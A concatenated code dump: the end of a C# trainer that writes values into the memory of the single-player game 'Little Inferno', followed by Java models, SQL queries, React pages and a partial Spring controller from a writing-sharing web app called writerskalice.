public Mem MemLib = new Mem();
int gameProcId;
private void Form2_Load(object sender, EventArgs e)
{
}
private void metroTextBox1_Click(object sender, EventArgs e)
{
}
private void metroLabel2_Click(object sender, EventArgs e)
{
}
private void metroButton1_Click(object sender, EventArgs e)
{
if(gameProcId > 0)
{
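// The address string appears to be a pointer chain for the Memory library:
// start at "Little Inferno.exe" + 0x0041FF00, follow each offset in turn,
// and write the textbox value as an int at the final address.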
MemLib.writeMemory("Little Inferno.exe+0x0041FF00,0x30,0x4,0x158,0x0,0x20", "int", metroTextBox1.Text);
}
else
{
MessageBox.Show("There was a problem Handeling your Request, Please Contact the Creator of the trainer");
}
}
private void timer1_Tick(object sender, EventArgs e)
{
}
private void metroButton3_Click(object sender, EventArgs e)
{
gameProcId = MemLib.getProcIDFromName("Little Inferno");
if (gameProcId != 0)
{
metroLabel6.Text = gameProcId.ToString();
MemLib.OpenGameProcess(gameProcId);
metroLabel4.Text = "Game Found!";
metroLabel4.Style = MetroFramework.MetroColorStyle.Green;
metroTextBox1.Enabled = true;
metroTextBox2.Enabled = true;
metroButton1.Enabled = true;
metroButton2.Enabled = true;
metroButton3.Enabled = false;
}
else
{
MessageBox.Show("Error Game Must Be Running First");
}
}
private void metroButton2_Click(object sender, EventArgs e)
{
if(gameProcId > 0)
{
MemLib.writeMemory("Little Inferno.exe+0041FF00,0x30,0x4,0x158,0x0,0x24", "int", metroTextBox2.Text);
}
}
}
}
| 2b37215cba747d7d2aadf431239e3377ee165242 | ["Markdown", "C#"] | 2 | Markdown | mikeatlantis/Little-inferno-Trainer-Source-code | 2225348b4607f30d2c125b16029a731ee747d6e7 | 11501752f7b26f0c2beaca4719862a078a7ac296 | refs/heads/main |
<file_sep>package com.writerskalice.server.models.postmodels;
import lombok.AllArgsConstructor;
import lombok.Data;
import lombok.NoArgsConstructor;
import java.util.ArrayList;
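/**
 * Request body for the /users/createuser endpoint: account credentials,
 * profile fields, privacy toggles, and the ids of the chosen interest tags.
 */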
@Data
@NoArgsConstructor
@AllArgsConstructor
public class CreateUserProfileData {
private String username;
private String password;
private String name;
private String email;
private String bio;
private Boolean isAboveEighteen;
private Boolean showInterestTags;
private Boolean showName;
private Boolean showBio;
private ArrayList<Integer> tags;
}
<file_sep>-- Gets a post: /posts/getpost
-- 1. Get everything except the tags
select post_id, title, content, n_pos_rcn, n_neg_rcn, n_comments, anonymous, postedby_username, posted_date from getpost_view_com_rcn_int
where post_id = 101;
-- 2. Get the tags
select it.description as interest from post_interests left join interest_tags it on post_interests.interest_id = it.interest_id
where post_interests.post_id = 101;
-- OR USE VIEW:
select description as interest from posts_get_interest_tags where post_id = 101;
-- Gets the comments on a post /posts/getcomments
select content, user_id, anonymous from post_comments pc left join comments c on c.comment_id = pc.comment_id
where post_id = 101;
-- use the uid from the prev query here to get the postedbyUsername:
select username as postedby_username from users_table where user_id = 1;
-- OR USE THE VIEW (single query) instead of above 2:
select content, postedby_username, anonymous from get_comments where post_id = 101;
-- Gets the data required for author display
select name, username, rank_id, rank_desc, num_stars, about_me as bio, show_name, show_bio, show_interests from profile_display
where user_id = 101;
-- Gets the data for the profile settings page
select name, about_me as bio, rank_id, rank_desc, num_stars, show_name, show_bio, show_interests from profile_display where user_id = 101;
select email from user_email_ids where user_id = 101;
select is_above_eighteen from profiles where user_id = 101;
-- Gets the view request details
-- 1. Get everything except the tags
select vr.post_id as post_id, title, content, n_pos_rcn, n_neg_rcn, n_comments, anonymous, postedby_username, posted_date, from_user_id, sent_date_time from view_requests as vr
left join getpost_view_com_rcn_int gvcri on vr.post_id = gvcri.post_id
where vr.from_user_id = 101; -- enter current user id
-- 2. Get the tags (loop for each of the posts)
select it.description as interest from post_interests left join interest_tags it on post_interests.interest_id = it.interest_id
where post_interests.post_id = 101;
-- OR USE VIEW:
select description as interest from posts_get_interest_tags where post_id = 101;<file_sep>import React from 'react';
import logo from './public/assets/logo.png';
import './css/build/tailwind.css';
import PopupMenuList from './PopupMenuList';
import Chip from '@material-ui/core/Chip';
import serverUrl from './appconfig';
import { Link } from 'react-router-dom';
import Snackbar from '@material-ui/core/Snackbar';
import MuiAlert, { AlertProps } from '@material-ui/lab/Alert';
import Post from './Post';
import InterestChip from './InterestChip';
import { tagToId } from './utils';
function Alert(props) {
return <MuiAlert elevation={6} variant="filled" {...props} />
}
export default class NewPostPage extends React.Component {
constructor(props) {
super(props);
this.state = {
interestTags: [],
title: '',
content: '',
anonymous: false,
above_eighteen: false,
successSnkOpen: false,
failedSnkOpen: false,
warnSnkOpen: false,
errorText: '',
successText: '',
warnText: '',
};
this.handleProfileSettings = this.handleProfileSettings.bind(this);
this.handleLogout = this.handleLogout.bind(this);
this.handleVR = this.handleVR.bind(this);
this.handlePost = this.handlePost.bind(this);
this.handleOptions = this.handleOptions.bind(this);
}
handleOptions(event) {
const target = event.target;
const value = target.type === 'checkbox' ? target.checked : target.value;
const optionName = target.name;
this.setState(state => ({
[optionName]: value
}));
}
addTag(interest) {
console.log(this.state.interestTags);
this.setState(state => {
const interestTags = state.interestTags.concat(interest);
return {
interestTags: interestTags
};
});
}
removeTag(interest) {
console.log(this.state.interestTags);
function arrayRemove(arr, value) {
return arr.filter(function (elem) {
return elem != value;
});
}
this.setState(state => ({
interestTags: arrayRemove(state.interestTags, interest)
}));
}
handleProfileSettings() {
console.log("Profile Settings");
}
handleLogout() {
console.log("Logout");
}
handleVR() {
console.log("View requests");
}
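// Validates that the title and content are non-empty, then POSTs the new
// post (title, content, 18+ flag, anonymity, author id, and interest-tag
// ids) to /posts/createpost and redirects to the feed on success.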
handlePost() {
if (!this.state.title || !this.state.content) {
this.setState({
errorText: 'A blank post? Really?',
failedSnkOpen: true,
});
return;
}
// send post
fetch(serverUrl + "/posts/createpost", {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
title: this.state.title,
content: this.state.content,
isAboveEighteen: this.state.above_eighteen,
anonymous: this.state.anonymous,
postedbyUid: window.localStorage.getItem("wKuid"),
tags: this.state.interestTags.map((tag) => tagToId(tag)),
})
}).then((response) => {
if (response.ok) {
this.setState({
successText: 'Posted!',
successSnkOpen: true,
});
window.setTimeout(() => this.props.history.push('/feed'), 1000);
}
else {
this.setState({
errorText: 'Could not post!',
failedSnkOpen: true,
});
}
});
}
render() {
return (
<div className="flex flex-col h-screen bg-gray-900">
<nav className="bg-gray-800">
<div className="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8">
<div className="flex items-center justify-between h-16">
<div className="flex items-center">
<div className="flex-shrink-0">
<img className="block lg:hidden h-8 w-auto" src={logo} alt="wK logo" />
<img className="hidden lg:block h-8 w-auto" src={logo} alt="wK logo" />
</div>
<div className="hidden md:block">
<div className="ml-10 flex items-baseline space-x-4">
<Link to="/feed">
<a href="#"
className="px-3 py-2 rounded-md text-sm font-medium text-gray-300 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Feed</a>
</Link>
<Link to="/savedPosts">
<a href="#"
className="px-3 py-2 rounded-md text-sm font-medium text-gray-300 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Saved Posts</a>
</Link>
<Link to="/seenPosts">
<a href="#"
className="px-3 py-2 rounded-md text-sm font-medium text-gray-300 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Seen Posts</a>
</Link>
</div>
</div>
</div>
<div className="hidden md:block">
<div className="ml-4 flex items-center md:ml-6">
{/*<button
className="p-1 border-2 border-transparent text-gray-400 rounded-full hover:text-white focus:outline-none focus:text-white focus:bg-gray-700"
aria-label="Notifications">
<svg className="h-6 w-6" stroke="currentColor" fill="none" viewBox="0 0 24 24">
<path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
d="M15 17h5l-1.405-1.405A2.032 2.032 0 0118 14.158V11a6.002 6.002 0 00-4-5.659V5a2 2 0 10-4 0v.341C7.67 6.165 6 8.388 6 11v3.159c0 .538-.214 1.055-.595 1.436L4 17h5m6 0v1a3 3 0 11-6 0v-1m6 0H9" />
</svg>
</button>*/}
{/* Profile dropdown */}
<div className="ml-3 mt-1 relative">
<PopupMenuList name='User' onLogout={this.handleLogout} onVR={this.handleVR} onProfile={this.handleProfileSettings} />
</div>
</div>
</div>
<div className="-mr-2 flex md:hidden">
{/* Mobile menu button */}
<button
className="inline-flex items-center justify-center p-2 rounded-md text-gray-400 hover:text-white hover:bg-gray-700 focus:outline-none focus:bg-gray-700 focus:text-white">
{/* Menu open: "hidden", Menu closed: "block" */}
<svg className="block h-6 w-6" stroke="currentColor" fill="none" viewBox="0 0 24 24">
<path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
d="M4 6h16M4 12h16M4 18h16" />
</svg>
{/* Menu open: "block", Menu closed: "hidden" */}
<svg className="hidden h-6 w-6" stroke="currentColor" fill="none" viewBox="0 0 24 24">
<path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
d="M6 18L18 6M6 6l12 12" />
</svg>
</button>
</div>
</div>
</div>
{/*
Mobile menu, toggle classes based on menu state.
Open: "block", closed: "hidden"
*/}
<div className='hidden'>
<div className="px-2 pt-2 pb-3 space-y-1 sm:px-3">
<a href="#"
className="block px-3 py-2 rounded-md text-base font-medium text-white bg-gray-900 focus:outline-none focus:text-white focus:bg-gray-700">Feed</a>
<a href="#"
className="block px-3 py-2 rounded-md text-base font-medium text-gray-300 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Team</a>
<a href="#"
className="block px-3 py-2 rounded-md text-base font-medium text-gray-300 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Projects</a>
<a href="#"
className="block px-3 py-2 rounded-md text-base font-medium text-gray-300 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Calendar</a>
<a href="#"
className="block px-3 py-2 rounded-md text-base font-medium text-gray-300 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Reports</a>
</div>
<div className="pt-4 pb-3 border-t border-gray-700">
<div className="flex items-center px-5 space-x-3" onClick={() => this.setState(state => ({ profileMenuOpen: !state.profileMenuOpen }))}>
<div className="flex-shrink-0">
<img className="h-10 w-10 rounded-full"
src="https://images.unsplash.com/photo-1472099645785-5658abf4ff4e?ixlib=rb-1.2.1&ixid=eyJhcHBfaWQiOjEyMDd9&auto=format&fit=facearea&facepad=2&w=256&h=256&q=80"
alt="" />
</div>
<div className="space-y-1">
<div className="text-base font-medium leading-none text-white"><NAME></div>
<div className="text-sm font-medium leading-none text-gray-400"><EMAIL></div>
</div>
</div>
<div className="mt-3 px-2 space-y-1">
<a href="#"
className="block px-3 py-2 rounded-md text-base font-medium text-gray-400 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Your
Profile</a>
<a href="#"
className="block px-3 py-2 rounded-md text-base font-medium text-gray-400 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Settings</a>
<a href="#"
className="block px-3 py-2 rounded-md text-base font-medium text-gray-400 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Sign
out</a>
</div>
</div>
</div>
</nav>
<header className="bg-gray-800 shadow">
<div className="max-w-7xl mx-auto py-6 px-4 sm:px-6 lg:px-8">
<h1 className="text-3xl font-bold leading-tight text-white">
Write
</h1>
</div>
</header>
<main className="flex-grow">
<section className="text-gray-500 bg-gray-900 body-font relative">
<div className="container px-5 py-12 mx-auto">
<div className="flex flex-col text-center w-full mb-12">
<h1 className="sm:text-3xl text-2xl font-medium title-font mb-4 text-white">Scream out your genius!</h1>
<p className="lg:w-2/3 mx-auto leading-relaxed text-base">Markdown support is planned for the future. Also, feel free to drag down the text area to enlarge it for comfort!</p>
</div>
<div className="lg:w-full h-full md:w-full mx-auto">
<div className="flex flex-col flex-wrap -m-2">
<div className="p-2 w-full">
<input className="w-full bg-gray-900 rounded border border-gray-700 text-white focus:outline-none focus:border-indigo-800 text-base px-4 py-2" placeholder="Title" type="text" onChange={this.handleOptions} name="title" />
</div>
<div className="p-2 w-full">
<textarea className="w-full bg-gray-900 rounded border h-56 border-gray-700 text-white focus:outline-none focus:border-indigo-800 text-base px-4 py-2 block" placeholder="Content" onChange={this.handleOptions} name="content"></textarea>
</div>
</div>
</div>
<div className="grid grid-cols-2">
<div className="mt-10 block text-gray-400">
<p className="font-semibold text-lg mb-2 mt-2">Post Settings</p>
<div className="mt-2 text-gray-400">
<div>
<label className="inline-flex items-center">
<input type="checkbox" className="form-checkbox form-checkbox-dark text-indigo-600" checked={this.state.anonymous} onChange={this.handleOptions} name="anonymous" />
<span className="ml-2 form text-gray-400 font-thin">Post anonymously</span>
</label>
</div>
<div>
<label className="inline-flex items-center">
<input type="checkbox" className="form-checkbox form-checkbox-dark text-pink-500" checked={this.state.above_eighteen} onChange={this.handleOptions} name="above_eighteen" />
<span className="font-thin text-gray-400 ml-2">For 18+ audience</span>
</label>
</div>
<div className="p-2 w-full">
<button className="flex mx-auto text-white bg-indigo-600 border-0 py-2 px-10 focus:outline-none hover:bg-indigo-700 rounded text-lg"
onClick={this.handlePost}>Post</button>
</div>
</div>
</div>
<div className="mt-10 block text-gray-400">
<p className="font-semibold text-lg mb-1 mt-2">Add Tags</p>
<p className="text-hairline mb-3">Click on tags to toggle them. Filled tags are applied, and outlined ones are not.</p>
<div className="grid-flow-row">
<InterestChip text="Poetry" onOn={() => this.addTag('poetry')} onOff={() => this.removeTag('poetry')} />
<InterestChip text="Prose" onOn={() => this.addTag('prose')} onOff={() => this.removeTag('prose')} />
<InterestChip text="Short stories" onOn={() => this.addTag('short_stories')} onOff={() => this.removeTag('short_stories')} />
<InterestChip text="Idle thoughts" onOn={() => this.addTag('idle_thoughts')} onOff={() => this.removeTag('idle_thoughts')} />
<InterestChip text="Parody" onOn={() => this.addTag('parody')} onOff={() => this.removeTag('parody')} />
<InterestChip text="Jokes" onOn={() => this.addTag('jokes')} onOff={() => this.removeTag('jokes')} />
<InterestChip text="Nature" onOn={() => this.addTag('nature')} onOff={() => this.removeTag('nature')} />
</div>
</div>
</div>
</div>
</section>
</main>
<footer className="text-gray-500 bg-gray-900 body-font min-h-0">
<div className="container px-5 py-8 mx-auto text-gray-500 bg-gray-900 flex items-center sm:flex-row flex-col">
<a className="flex title-font font-medium items-center md:justify-start justify-center text-white">
<img src={logo} className="h-10" />
</a>
{/*<p className="text-sm text-gray-600 sm:ml-4 sm:pl-4 sm:border-l-2 sm:border-gray-800 sm:py-2 sm:mt-0 mt-4">© 2020 tailblocks —
<a href="https://twitter.com/knyttneve" className="text-gray-500 ml-1" target="_blank" rel="noopener noreferrer">@knyttneve</a>
</p>*/}
<span className="inline-flex sm:ml-auto sm:mt-0 mt-4 justify-center sm:justify-start">
<a className="text-gray-600">
<svg fill="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
className="w-5 h-5" viewBox="0 0 24 24">
<path d="M18 2h-3a5 5 0 00-5 5v3H7v4h3v8h4v-8h3l1-4h-4V7a1 1 0 011-1h3z"></path>
</svg>
</a>
<a className="ml-3 text-gray-600">
<svg fill="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
className="w-5 h-5" viewBox="0 0 24 24">
<path
d="M23 3a10.9 10.9 0 01-3.14 1.53 4.48 4.48 0 00-7.86 3v1A10.66 10.66 0 013 4s-4 9 5 13a11.64 11.64 0 01-7 2c9 5 20 0 20-11.5a4.5 4.5 0 00-.08-.83A7.72 7.72 0 0023 3z">
</path>
</svg>
</a>
<a className="ml-3 text-gray-600">
<svg fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round"
stroke-width="2" className="w-5 h-5" viewBox="0 0 24 24">
<rect width="20" height="20" x="2" y="2" rx="5" ry="5"></rect>
<path d="M16 11.37A4 4 0 1112.63 8 4 4 0 0116 11.37zm1.5-4.87h.01"></path>
</svg>
</a>
<a className="ml-3 text-gray-600">
<svg fill="currentColor" stroke="currentColor" stroke-linecap="round"
stroke-linejoin="round" stroke-width="0" className="w-5 h-5" viewBox="0 0 24 24">
<path stroke="none"
d="M16 8a6 6 0 016 6v7h-4v-7a2 2 0 00-2-2 2 2 0 00-2 2v7h-4v-7a6 6 0 016-6zM2 9h4v12H2z">
</path>
<circle cx="4" cy="4" r="2" stroke="none"></circle>
</svg>
</a>
</span>
</div>
</footer>
<Snackbar open={this.state.successSnkOpen} autoHideDuration={2000} onClose={() => this.setState({ successSnkOpen: false })}>
<Alert onClose={() => this.setState({ successSnkOpen: false })} severity="success">
{this.state.successText}
</Alert>
</Snackbar>
<Snackbar open={this.state.failedSnkOpen} autoHideDuration={2000} onClose={() => this.setState({ failedSnkOpen: false })}>
<Alert onClose={() => this.setState({ successSnkOpen: false })} severity="error">
{this.state.errorText}
</Alert>
</Snackbar>
<Snackbar open={this.state.warnSnkOpen} autoHideDuration={2000} onClose={() => this.setState({ warnSnkOpen: false })}>
<Alert onClose={() => this.setState({ warnSnkOpen: false })} severity="warning">
{this.state.warnText}
</Alert>
</Snackbar>
</div>
);
}
}<file_sep>import React from 'react';
import './css/build/tailwind.css';
export default class Comment extends React.Component {
componentDidMount() {
console.log(this.props.anonymous);
}
render() {
return (
<div className="py-8 flex flex-wrap md:flex-no-wrap border-b-2 border-gray-800">
<div className="md:flex-grow">
<h2 className="text-lg font-medium text-white title-font mb-2"><span className="font-semibold">{this.props.anonymous ? '(anonymous)' : this.props.postedbyUsername}</span> says:</h2>
<p className="leading-relaxed text-gray-400">{this.props.content}</p>
</div>
</div>
);
}
}<file_sep>import React from 'react';
import logo from './public/assets/logo.png';
import './css/build/tailwind.css';
import PopupMenuList from './PopupMenuList';
import { Link } from 'react-router-dom';
import serverUrl from "./appconfig";
import Snackbar from '@material-ui/core/Snackbar';
import MuiAlert, { AlertProps } from '@material-ui/lab/Alert';
import Post from './Post';
function Alert(props) {
return <MuiAlert elevation={6} variant="filled" {...props} />
}
export default class ViewRequestsPage extends React.Component {
constructor(props) {
super(props);
this.state = {
posts: []
}
this.handleWrite = this.handleWrite.bind(this);
this.handleProfileSettings = this.handleProfileSettings.bind(this);
this.handleLogout = this.handleLogout.bind(this);
this.handleVR = this.handleVR.bind(this);
}
componentDidMount() {
fetch(serverUrl + "/users/getviewrequests?userId=" + window.localStorage.getItem("wKuid"), { method: 'GET' })
.then((response) => response.json())
.then((data) => {
console.log(data);
this.setState({
posts: data
});
});
}
handleWrite() {
console.log("Write");
window.setTimeout(() => this.props.history.push('/write'), 10);
}
handleProfileSettings() {
console.log("Profile Settings");
}
handleLogout() {
console.log("Logout");
}
handleVR() {
console.log("View requests");
}
render() {
return (
<div className="flex flex-col bg-gray-900">
<nav className="bg-gray-800">
<div className="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8">
<div className="flex items-center justify-between h-16">
<div className="flex items-center">
<div className="flex-shrink-0">
<img className="block lg:hidden h-8 w-auto" src={logo} alt="wK logo" />
<img className="hidden lg:block h-8 w-auto" src={logo} alt="wK logo" />
</div>
<div className="hidden md:block">
<div className="ml-10 flex items-baseline space-x-4">
<Link to="/feed">
<a href="#"
className="px-3 py-2 rounded-md text-sm font-medium text-gray-300 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Feed</a>
</Link>
<Link to="/savedPosts">
<a href="#"
className="px-3 py-2 rounded-md text-sm font-medium text-gray-300 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Saved Posts</a>
</Link>
<Link to="/seenPosts">
<a href="#"
className="px-3 py-2 rounded-md text-sm font-medium text-gray-300 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Seen Posts</a>
</Link>
</div>
</div>
</div>
<div className="hidden md:block">
<div className="ml-4 flex items-center md:ml-6">
{/*<button
className="p-1 border-2 border-transparent text-gray-400 rounded-full hover:text-white focus:outline-none focus:text-white focus:bg-gray-700"
aria-label="Notifications">
<svg className="h-6 w-6" stroke="currentColor" fill="none" viewBox="0 0 24 24">
<path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
d="M15 17h5l-1.405-1.405A2.032 2.032 0 0118 14.158V11a6.002 6.002 0 00-4-5.659V5a2 2 0 10-4 0v.341C7.67 6.165 6 8.388 6 11v3.159c0 .538-.214 1.055-.595 1.436L4 17h5m6 0v1a3 3 0 11-6 0v-1m6 0H9" />
</svg>
</button>*/}
<button className="text-white bg-indigo-600 border-0 py-2 px-6 focus:outline-none hover:bg-indigo-700 rounded justify-center text-lg" onClick={this.handleWrite}>
Write
</button>
{/* Profile dropdown */}
<div className="ml-3 mt-1 relative">
<PopupMenuList name='User' onLogout={this.handleLogout} onVR={this.handleVR} onProfile={this.handleProfileSettings} />
</div>
</div>
</div>
<div className="-mr-2 flex md:hidden">
{/* Mobile menu button */}
<button
className="inline-flex items-center justify-center p-2 rounded-md text-gray-400 hover:text-white hover:bg-gray-700 focus:outline-none focus:bg-gray-700 focus:text-white">
{/* Menu open: "hidden", Menu closed: "block" */}
<svg className="block h-6 w-6" stroke="currentColor" fill="none" viewBox="0 0 24 24">
<path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
d="M4 6h16M4 12h16M4 18h16" />
</svg>
{/* Menu open: "block", Menu closed: "hidden" */}
<svg className="hidden h-6 w-6" stroke="currentColor" fill="none" viewBox="0 0 24 24">
<path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
d="M6 18L18 6M6 6l12 12" />
</svg>
</button>
</div>
</div>
</div>
{/*
Mobile menu, toggle classes based on menu state.
Open: "block", closed: "hidden"
*/}
<div className='hidden'>
<div className="px-2 pt-2 pb-3 space-y-1 sm:px-3">
<Link to="/feed">
<a href="#"
className="block px-3 py-2 rounded-md text-base font-medium text-white bg-gray-900 focus:outline-none focus:text-white focus:bg-gray-700">Feed</a>
</Link>
<a href="#"
className="block px-3 py-2 rounded-md text-base font-medium text-gray-300 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Team</a>
<a href="#"
className="block px-3 py-2 rounded-md text-base font-medium text-gray-300 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Projects</a>
<a href="#"
className="block px-3 py-2 rounded-md text-base font-medium text-gray-300 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Calendar</a>
<a href="#"
className="block px-3 py-2 rounded-md text-base font-medium text-gray-300 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Reports</a>
</div>
<div className="pt-4 pb-3 border-t border-gray-700">
<div className="flex items-center px-5 space-x-3" onClick={() => this.setState(state => ({ profileMenuOpen: !state.profileMenuOpen }))}>
<div className="flex-shrink-0">
<img className="h-10 w-10 rounded-full"
src="https://images.unsplash.com/photo-1472099645785-5658abf4ff4e?ixlib=rb-1.2.1&ixid=eyJhcHBfaWQiOjEyMDd9&auto=format&fit=facearea&facepad=2&w=256&h=256&q=80"
alt="" />
</div>
<div className="space-y-1">
<div className="text-base font-medium leading-none text-white"><NAME></div>
<div className="text-sm font-medium leading-none text-gray-400"><EMAIL></div>
</div>
</div>
<div className="mt-3 px-2 space-y-1">
<a href="#"
className="block px-3 py-2 rounded-md text-base font-medium text-gray-400 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Your
Profile</a>
<a href="#"
className="block px-3 py-2 rounded-md text-base font-medium text-gray-400 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Settings</a>
<a href="#"
className="block px-3 py-2 rounded-md text-base font-medium text-gray-400 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Sign
out</a>
</div>
</div>
</div>
</nav>
<header className="bg-gray-800 shadow">
<div className="max-w-7xl mx-auto py-6 px-4 sm:px-6 lg:px-8">
<h1 className="text-3xl font-bold leading-tight text-white">
View Requests
</h1>
</div>
</header>
<main className="flex-grow">
<div className="max-w-7xl mx-auto py-6 sm:px-6 lg:px-8 bg-gray-900">
{/* Replace with your content */}
<section className="text-gray-500 bg-gray-900 body-font overflow-hidden">
<div className="container px-5 py-24 mx-auto">
<div className="flex flex-wrap -m-12">
{this.state.posts.map((post) => {
console.log(post);
return <Post content={post.content} title={post.title}
key={post.id}
id={post.id}
nPosReactions={post.nposReactions.toString()}
nNegReactions={post.nnegReactions.toString()}
nComments={post.ncomments.toString()} anonymous={post.anonymous}
postedbyUsername={post.postedbyUsername} viewReqType={true}
sentbyUsername={post.sentbyUsername}
tags={post.tags}
/>
}
)}
</div>
</div>
<div className="grid grid-cols-5 place-content-center h-48">
<div className="text-gray-700 text-center px-4 py-2 m-2"></div>
<div className="text-gray-700 text-center px-4 py-2 m-2"></div>
<button className="text-white bg-gray-700 border-0 py-2 px-8 focus:outline-none hover:bg-gray-800 rounded justify-center text-lg" onClick={this.handleProfileMenuOpen}>
More
</button>
<div className="text-gray-700 text-center px-4 py-2 m-2"></div>
<div className="text-gray-700 text-center px-4 py-2 m-2"></div>
</div>
</section>
{/* /End replace */}
</div>
</main>
<footer className="text-gray-500 bg-gray-900 body-font min-h-0">
<div className="container px-5 py-8 mx-auto flex items-center sm:flex-row flex-col">
<a className="flex title-font font-medium items-center md:justify-start justify-center text-white">
<img src={logo} className="h-10" />
</a>
{/*<p className="text-sm text-gray-600 sm:ml-4 sm:pl-4 sm:border-l-2 sm:border-gray-800 sm:py-2 sm:mt-0 mt-4">© 2020 tailblocks —
<a href="https://twitter.com/knyttneve" className="text-gray-500 ml-1" target="_blank" rel="noopener noreferrer">@knyttneve</a>
</p>*/}
<span className="inline-flex sm:ml-auto sm:mt-0 mt-4 justify-center sm:justify-start">
<a className="text-gray-600">
<svg fill="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
className="w-5 h-5" viewBox="0 0 24 24">
<path d="M18 2h-3a5 5 0 00-5 5v3H7v4h3v8h4v-8h3l1-4h-4V7a1 1 0 011-1h3z"></path>
</svg>
</a>
<a className="ml-3 text-gray-600">
<svg fill="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
className="w-5 h-5" viewBox="0 0 24 24">
<path
d="M23 3a10.9 10.9 0 01-3.14 1.53 4.48 4.48 0 00-7.86 3v1A10.66 10.66 0 013 4s-4 9 5 13a11.64 11.64 0 01-7 2c9 5 20 0 20-11.5a4.5 4.5 0 00-.08-.83A7.72 7.72 0 0023 3z">
</path>
</svg>
</a>
<a className="ml-3 text-gray-600">
<svg fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round"
stroke-width="2" className="w-5 h-5" viewBox="0 0 24 24">
<rect width="20" height="20" x="2" y="2" rx="5" ry="5"></rect>
<path d="M16 11.37A4 4 0 1112.63 8 4 4 0 0116 11.37zm1.5-4.87h.01"></path>
</svg>
</a>
<a className="ml-3 text-gray-600">
<svg fill="currentColor" stroke="currentColor" stroke-linecap="round"
stroke-linejoin="round" stroke-width="0" className="w-5 h-5" viewBox="0 0 24 24">
<path stroke="none"
d="M16 8a6 6 0 016 6v7h-4v-7a2 2 0 00-2-2 2 2 0 00-2 2v7h-4v-7a6 6 0 016-6zM2 9h4v12H2z">
</path>
<circle cx="4" cy="4" r="2" stroke="none"></circle>
</svg>
</a>
</span>
</div>
</footer>
</div>
);
}
}<file_sep>package com.writerskalice.server.models.getmodels;
import lombok.*;
import java.util.ArrayList;
import java.sql.Date;
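/**
 * Read model for a post as returned to the client: title and content,
 * reaction and comment counts, anonymity flag, author username, interest
 * tags, and the date it was posted.
 */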
@Data
@AllArgsConstructor
@NoArgsConstructor
public class Post {
private Integer id;
private String title;
private String content;
private Integer nPosReactions;
private Integer nNegReactions;
private Integer nComments;
private Boolean anonymous;
private String postedbyUsername;
private ArrayList<String> tags;
private Date postedOn;
}<file_sep>package com.writerskalice.server.controllers;
import com.writerskalice.server.dao.PostRepository;
import com.writerskalice.server.dao.UserRepository;
import com.writerskalice.server.dao.ViewRequestRepository;
import com.writerskalice.server.models.postmodels.SetSeenData;
import com.writerskalice.server.models.deletemodels.ViewRequestSeenData;
import com.writerskalice.server.models.postmodels.*;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.http.HttpStatus;
import org.springframework.http.ResponseEntity;
import org.springframework.web.bind.annotation.*;
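/**
 * REST write endpoints for the writerskalice server: sign-in checks, user and
 * profile creation/updates, view requests, comments, reactions, new posts,
 * marking posts as seen, and saving posts. Each handler delegates to a
 * repository and maps failures to non-2xx statuses; duplicate-key violations
 * (detected by the constraint name in the exception message) are reported as
 * ALREADY_REPORTED so the client can show an "only once" message.
 */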
@RestController
@CrossOrigin(origins = "http://localhost:3000")
public class POSTController {
@Autowired
PostRepository postRepository;
@Autowired
UserRepository userRepository;
@Autowired
ViewRequestRepository viewRequestRepository;
@PostMapping("/users/checksignin")
@CrossOrigin(origins = "http://localhost:3000")
public ResponseEntity<?> checkSignIn(@RequestBody SignInDetails details) {
try {
var res = userRepository.checkUserCreds(details.getUsername(), details.getPassword());
if (!((Boolean)res.get("success")))
throw new Exception();
else
return new ResponseEntity<>(res, HttpStatus.OK);
}
catch (Exception e) {
e.printStackTrace();
return new ResponseEntity<>(null, HttpStatus.UNAUTHORIZED);
}
}
@PostMapping("/users/createuser")
@CrossOrigin(origins = "http://localhost:3000")
public ResponseEntity<?> createUserAndProfile(@RequestBody CreateUserProfileData userProfileData) {
try {
var res = userRepository.createUserProfile(userProfileData);
if (!((Boolean)res.get("success")))
throw new Exception();
else
return new ResponseEntity<>(res, HttpStatus.OK);
}
catch (Exception e) {
e.printStackTrace();
return new ResponseEntity<>(null, HttpStatus.NOT_MODIFIED);
}
}
@PostMapping("/users/updateprofiledata")
